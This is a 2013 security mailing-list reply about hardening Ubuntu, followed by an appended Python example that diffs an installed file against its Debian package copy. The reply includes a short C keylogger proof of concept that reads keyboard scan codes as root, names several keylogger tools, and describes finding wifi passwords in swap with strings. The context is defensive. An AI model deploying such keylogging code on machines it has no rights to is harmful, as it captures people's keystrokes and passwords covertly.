[HacktionLab] Basic security practice for Ubuntu

johnc johnc at aktivix.org
Wed May 8 01:39:07 UTC 2013


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hi,

I'll have a stab at answering this:

* As regards having an encrypted hard drive, hopefully that includes
swap, root and home .... and the rest just excluding /boot. The last
time I checked you couldn't do a fully encrypted install with the
Ubuntu installer. It was one of the many reasons I changed to Debian.
(This fact may be out of date though?!). To see why this is important
do the following to your swap partition ( replace /dev/sda3 as
appropriate).

strings /dev/sda3 >dump.txt
This is mostly rubbish but I found wifi passwords in here before!

* With Linux, it's hard to get a key logger onto your computer,
especially if you only ever install with packages from trusted repos.
If you never let the computer out of your sight, you are probably ok :-).

There's no shortage of key loggers though: lkl, uberkey, THC-vlogger,
PyKeylogger, logkeys etc.

I wrote one in a few lines of C as a proof of concept. This is
horribly crude. It only logs raw scan codes from the keyboard buffer
but you wouldn't have to do much to extract the characters typed.

#include <stdio.h>
#include <unistd.h>
#include <sys/io.h>   /* ioperm(), inb(): x86 only, must run as root */

int main(void)
{
  /* ask the kernel for access to I/O port 0x60 (keyboard controller data port) */
  if (ioperm(0x0060, 1, 1) != 0) {
    perror("ioperm");
    return 1;
  }

  /* read until scan code 1 (Escape) shows up, printing each raw scan code */
  while (inb(0x0060) != 1)
    printf("\nKey: %i", inb(0x0060));

  return 0;
}
gcc -o log ./log.c # to compile

* Detecting anything other than the common keyboard loggers would be hard.

I like RKhunter :-). I don't think there is a quick way to tell if
reported file changes are bad but you could diff the file with the
original.

Find out what package the file "foo" belongs to:
 aptitude install apt-file
 apt-file update
 apt-file search foo

say it was in package "bar":
Download package and extract file foo
 mkdir mytemp
 cd mytemp
 aptitude download bar
Install binutils to get ar extraction utility:
 aptitude install binutils
 ar -x bar.deb
 tar -zxvf data.tar.gz
Say the file foo was in etc, the extracted file is in ./mytemp/etc/foo
Diff them:
 diff /etc/foo ./mytemp/etc/foo | less
Then go and check out what those changed lines mean via the man or a wiki.

Cheers,
John

On 07/05/13 16:30, sam at bristolwireless.net wrote:
> 
> Hi All
> 
> I run Ubuntu
> 
> I'm interested in keeping my machine reasonably secure.
> 
> I have an encrypted hard drive
> 
> I occasionally run RKhunter, it doesn't show any rootkits, but 
> shows that some files have been changed. I'm unsure how to use
> this information.
> 
> Is there an easy way of scanning for software keyloggers?
> 
> 
> Thanks
> 
> Sam
> 
> 
> 
> 
> _______________________________________________ HacktionLab
> mailing list HacktionLab at lists.aktivix.org 
> https://lists.aktivix.org/mailman/listinfo/hacktionlab

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJRiay7AAoJELy1jPQ1KER7ef8QAMdyJmlGK7ZehhT0ICMzWtFw
YzxqmiIvHLH6xrpz0DzQvRcOTJaGbCh038I+7X+AvEokz/77VV6zEpQGQMy7wmxQ
1VhNrS0UYpcXALXplQwEAxKwJqI6s4s7JHBDiPndv+GzWso4ajY+vwRmyD/HDOvd
wAGDQpdjamJe3qZMgOZGv3EPnOcECHIk43EUiBbAxteFye8RdeEJ49E8X5RjB+WR
ny4uZtwrdge3fnTH3ZgE7dbe4d0VltJ8eht09dZFtlqwkvZphDnwdFghM+FgkvkI
dhPKGgMXZ51/xQeTB3CBBq8XNmr9xhOt9OjAYydlmLH+3w6QkIdB8icRtMbSCZQp
CFuSprRe+EhkUvOl/Nt4G8aDBnqEA8+UyLx78yWKe9a49TJ3tXqbLxCzhCug89Zw
5TZSlSiiVuy30a9XpLtXGeFMI8kEKSdqi9K+tXB28KPACmqR9/4bi3F9O5XZToxQ
i0XPTdf5JQ+yyeCjsOzGq1a4T0hIWqenAPXabS0O2MHRUktXbowrptir0a3KbdNU
lkMNG37gzVrZiz7p41YLxSLUGbeLbaDvF1zqUxiTgRcf49QiZ9S/zlnwBh5thvqZ
+LDGGfH3x/52UoeymLWjQ1XpFjByOxQiy9DtkuXBIl7jvKvboVYB6mh2MBtNYpaV
R2oFA9XH2/S+7sulmz2d
=Q9RT
-----END PGP SIGNATURE-----
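The apt-file / ar / diff procedure John describes above, carried out in Python as an added example (not code from John or from the HacktionLab list). It is written in Python rather than shell so it runs offline: instead of a .deb fetched with `aptitude download bar`, it constructs a minimal .deb in memory (the ar container with debian-binary, control.tar.gz and data.tar.gz members, exactly what `ar -x bar.deb` unpacks), pulls /etc/foo out of data.tar.gz, and produces the same kind of unified diff that `diff /etc/foo ./mytemp/etc/foo` would. The package name "bar", the path /etc/foo and both file contents are constructed sample values; `parse_ar` is a hand-written reader for the ar format, not an existing library function.

```python
"""Compare an installed file against the copy shipped in its Debian package."""
import difflib
import io
import tarfile

AR_MAGIC = b"!<arch>\n"          # ar(1) archive signature; every .deb starts with it


def parse_ar(data):
    """Read the ar archive that a .deb file is.  Each member has a 60-byte header:
    name(16) mtime(12) uid(6) gid(6) mode(8) size(10) and the two magic bytes '`\\n'."""
    if not data.startswith(AR_MAGIC):
        raise ValueError("not an ar archive")
    members = {}
    pos = len(AR_MAGIC)
    while pos + 60 <= len(data):
        hdr = data[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("bad ar member header at offset %d" % pos)
        # dpkg-deb writes plain names, GNU ar appends '/'; accept both
        name = hdr[0:16].decode("ascii").rstrip().rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        members[name] = data[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)     # members are padded to an even offset
    return members


def build_ar(members):
    """Inverse of parse_ar, used only to construct the sample .deb below."""
    out = bytearray(AR_MAGIC)
    for name, body in members:
        hdr = ("%-16s%-12d%-6d%-6d%-8s%-10d" % (name, 0, 0, 0, "100644", len(body))).encode("ascii") + b"`\n"
        out += hdr + body
        if len(body) % 2:
            out += b"\n"
    return bytes(out)


def make_tar_gz(files):
    """Build an in-memory data.tar.gz with dpkg-style './path' member names."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for path, content in files.items():
            info = tarfile.TarInfo(name="./" + path.lstrip("/"))
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def packaged_file(deb, path):
    """Return the bytes of `path` as shipped inside the .deb's data.tar member."""
    members = parse_ar(deb)
    data_name = next(n for n in members if n.startswith("data.tar"))
    with tarfile.open(fileobj=io.BytesIO(members[data_name]), mode="r:*") as tf:
        return tf.extractfile(tf.getmember("./" + path.lstrip("/"))).read()


def diff_against_package(deb, path, installed):
    """Unified diff, package copy on the left and the installed copy on the right."""
    original = packaged_file(deb, path).decode("utf-8", "replace").splitlines(keepends=True)
    current = installed.decode("utf-8", "replace").splitlines(keepends=True)
    return list(difflib.unified_diff(original, current,
                                     fromfile="package:" + path, tofile="installed:" + path))


def changed_lines(diff):
    """Just the added/removed lines, which are the ones to look up in the man page."""
    return [l.rstrip("\n") for l in diff
            if l[:1] in "+-" and not l.startswith(("+++", "---"))]


# --- constructed sample: package "bar" ships /etc/foo; the installed copy differs ---
PACKAGED_FOO = b"# bar configuration\nListen 127.0.0.1\nLogLevel info\n"
INSTALLED_FOO = b"# bar configuration\nListen 0.0.0.0\nLogLevel info\nAllowRemoteAdmin yes\n"

SAMPLE_DEB = build_ar([
    ("debian-binary", b"2.0\n"),
    ("control.tar.gz", make_tar_gz({"control": b"Package: bar\nVersion: 1.0\n"})),
    ("data.tar.gz", make_tar_gz({"/etc/foo": PACKAGED_FOO})),
])

if __name__ == "__main__":
    for line in diff_against_package(SAMPLE_DEB, "/etc/foo", INSTALLED_FOO):
        print(line, end="")
```

On a real system you would read the downloaded .deb with `open("bar_1.0_amd64.deb", "rb").read()` and the installed file with `open("/etc/foo", "rb").read()`; the rest is unchanged. The diff only tells you what differs, not whether the change is legitimate (a config edit you made yourself will show up the same way as a tampered file), so the changed lines still need checking against the package's documentation as John says.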
